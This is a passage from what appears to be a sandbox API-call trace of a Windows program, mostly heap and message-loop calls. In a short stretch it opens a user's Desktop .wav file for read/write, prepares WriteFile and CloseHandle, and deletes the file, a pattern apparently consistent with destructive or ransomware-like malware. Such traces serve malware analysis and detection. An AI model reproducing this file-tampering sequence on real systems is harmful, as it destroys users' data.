lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0032.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0032.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.493] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.493] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.493] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.493] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.494] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.494] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_wgswrxraqidmfu5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0032.494] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0032.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.495] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.496] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.496] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.496] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.497] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.497] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.497] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.497] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.497] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.497] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.497] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0032.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.498] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.498] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.498] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav", lpFilePart=0x0) returned 0x3a [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0032.498] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_wgswrxraqidmfu5.wav")) returned 0x20 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0032.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0032.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.499] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe74f0990, ftCreationTime.dwHighDateTime=0x1d5c506, ftLastAccessTime.dwLowDateTime=0xb2382ea0, ftLastAccessTime.dwHighDateTime=0x1d5bf46, ftLastWriteTime.dwLowDateTime=0x13408ec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x13bb6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="_WgswrxrAQIdMFU5.wav", cAlternateFileName="_WGSWR~1.WAV")) returned 0x7c2240 [0032.499] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_WgswrxrAQIdMFU5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_wgswrxraqidmfu5.wav")) returned 1 [0032.500] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe74f0990, ftCreationTime.dwHighDateTime=0x1d5c506, ftLastAccessTime.dwLowDateTime=0xb2382ea0, ftLastAccessTime.dwHighDateTime=0x1d5bf46, ftLastWriteTime.dwLowDateTime=0x13408ec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x13bb6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="_WgswrxrAQIdMFU5.wav", cAlternateFileName="_WGSWR~1.WAV")) returned 0 [0032.500] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.501] HeapFree 